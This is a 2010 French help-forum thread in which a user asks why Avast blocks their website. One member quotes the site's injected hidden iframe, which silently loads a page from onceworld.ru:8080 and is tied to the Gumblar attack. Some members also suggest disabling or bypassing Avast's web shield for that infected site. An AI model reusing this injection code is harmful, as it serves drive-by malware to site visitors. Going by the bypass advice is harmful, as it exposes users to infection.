Avast bloque l'accé à mon site infos
Fermé
kazdel
Messages postés
235
Statut
Membre
Dernière intervention
31 mai 2013
-
16 mars 2010 à 14:10
Philippe - 19 mars 2010 à 15:22
Philippe - 19 mars 2010 à 15:22
A voir également:
- Avast bloque l'accé à mon site infos
- Site de telechargement - Accueil - Outils
- Site comme coco - Accueil - Réseaux sociaux
- Code puk bloqué - Guide
- Quel site remplace coco - Accueil - Réseaux sociaux
- Site inaccessible - Guide
8 réponses
georges86400
Messages postés
1750
Statut
Membre
Dernière intervention
17 février 2013
143
16 mars 2010 à 14:19
16 mars 2010 à 14:19
Bonjour
je viens de cliquer sur ton lien et j'ai eu le site, mon antivirus bitdefender ne le bloque pas,
Erreur d'Avast ?
je viens de cliquer sur ton lien et j'ai eu le site, mon antivirus bitdefender ne le bloque pas,
Erreur d'Avast ?
georges86400
Messages postés
1750
Statut
Membre
Dernière intervention
17 février 2013
143
16 mars 2010 à 14:27
16 mars 2010 à 14:27
c'est bien pourquoi je ne veux pas Avast sur mes 3 PC de la maison.
Je viens d'essayer sur l'autre PC avec ESET 4.0 comme antivirus et je me connecte au site aussi
Je viens d'essayer sur l'autre PC avec ESET 4.0 comme antivirus et je me connecte au site aussi
Hello,
Il doit faire un amalgame avec Illiframe-F qui est dans sa base VPS, dès que l'on se connecte au site, il spécifie:
Contient le logiciel malveillant Illiframe-E [trj], pas de soucis avec Avira.
Donc moralité entre ce que Georges spécifie et également moi avec Avira, tu peux pour se site désactiver ta protection Bouclier Web.
A+Lusche Philippe
Il doit faire un amalgame avec Illiframe-F qui est dans sa base VPS, dès que l'on se connecte au site, il spécifie:
Contient le logiciel malveillant Illiframe-E [trj], pas de soucis avec Avira.
Donc moralité entre ce que Georges spécifie et également moi avec Avira, tu peux pour se site désactiver ta protection Bouclier Web.
A+Lusche Philippe
pas terrible l'Iframe lol
<noframes><body><iframe frameborder="0" onload="if (!this.src){ this.height='0'; this.src='http://onceworld.ru:8080/index.php'; this.width='0';}" >1258353721co3</iframe>
<noframes><body><iframe frameborder="0" onload="if (!this.src){ this.height='0'; this.src='http://onceworld.ru:8080/index.php'; this.width='0';}" >1258353721co3</iframe>
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
kazdel
Messages postés
235
Statut
Membre
Dernière intervention
31 mai 2013
1
17 mars 2010 à 12:56
17 mars 2010 à 12:56
ok je vous remercie pour votre aide.donc ce que j'ai compris je ne peus rien fair avec avast vous me conseillez de changer.je vais essayer de mettre bitdefender antivirus.encore une fois merci.
kazdel
Messages postés
235
Statut
Membre
Dernière intervention
31 mai 2013
1
17 mars 2010 à 21:34
17 mars 2010 à 21:34
re excusez moi mais j'ai rien compris a la reponse de angie.
Bonjour,
Comme le dit Angie, il y a possibilité d'infection sur ce site, le fait d'ouvrir le site simplement ne dit pas nécessairement que vous serez contaminé (puisque moi même je l'ai ouvert avec AVIRA et que par la suite j'ai fait un scan complet du PC avec AVIRA et Mbam) RAS, par contre le site en lui-même contient le logiciel malveillant, donc des risques d'infection pour vous.
Voici un lien qui vous informera un peu plus sur Gumblar:
https://www.clubic.com/actualite-277286-gumblar-attaque-xss-prend-ampleur.html
Si vous lisez bien, il est spécifié qu'une simple mise à jour de vos logiciels de sécurité vous diminuera les risques d'être infecté.
PS: merci aux membres d'un autre Forum qui ont participé à ce sujet.
Si vous désirez allez sur ce site, il suffit dans vos paramètres de avast de lui indiquer (cliquer droit sur la boule orange, Gestion des agents AVAST et sélectionner l'une des propositions)
A+Lusche Philippe
Comme le dit Angie, il y a possibilité d'infection sur ce site, le fait d'ouvrir le site simplement ne dit pas nécessairement que vous serez contaminé (puisque moi même je l'ai ouvert avec AVIRA et que par la suite j'ai fait un scan complet du PC avec AVIRA et Mbam) RAS, par contre le site en lui-même contient le logiciel malveillant, donc des risques d'infection pour vous.
Voici un lien qui vous informera un peu plus sur Gumblar:
https://www.clubic.com/actualite-277286-gumblar-attaque-xss-prend-ampleur.html
Si vous lisez bien, il est spécifié qu'une simple mise à jour de vos logiciels de sécurité vous diminuera les risques d'être infecté.
PS: merci aux membres d'un autre Forum qui ont participé à ce sujet.
Si vous désirez allez sur ce site, il suffit dans vos paramètres de avast de lui indiquer (cliquer droit sur la boule orange, Gestion des agents AVAST et sélectionner l'une des propositions)
A+Lusche Philippe
Ah ben , suffit de patienter, merci:-)
https://forums.commentcamarche.net/forum/affich-17028749-avast-bloque-l-acce-a-mon-site-infos#11
https://forums.commentcamarche.net/forum/affich-17028749-avast-bloque-l-acce-a-mon-site-infos#11
Bonjour,
On avance pas à pas dans cette histoire :-)
Voici quelques résultats assez contrariant tout de même.
Alarme de AVAST 4.8 et 5.0 (sous Firefox, Opera et IE)
AVIRA (version gratuite): pas d'alarme sous firefox
AVIRA (version gratuite): Alarme sous Internet Explorer version 8.0
NOD32: Alarme sous Internet explorer, pas testé sous Firefox, le pc avec Nod32 ne m'appartenant pas.
Si George et Angie peuvent faire des tests sous différents navigateur ou tout simplement nous dire ce qu'ils en pensent
A+Lusche Philippe
On avance pas à pas dans cette histoire :-)
Voici quelques résultats assez contrariant tout de même.
Alarme de AVAST 4.8 et 5.0 (sous Firefox, Opera et IE)
AVIRA (version gratuite): pas d'alarme sous firefox
AVIRA (version gratuite): Alarme sous Internet Explorer version 8.0
NOD32: Alarme sous Internet explorer, pas testé sous Firefox, le pc avec Nod32 ne m'appartenant pas.
Si George et Angie peuvent faire des tests sous différents navigateur ou tout simplement nous dire ce qu'ils en pensent
A+Lusche Philippe
16 mars 2010 à 14:23
Idem avec avast 4.8 version gratuite, il déconnecte le site de suite.
A+Lusche Philippe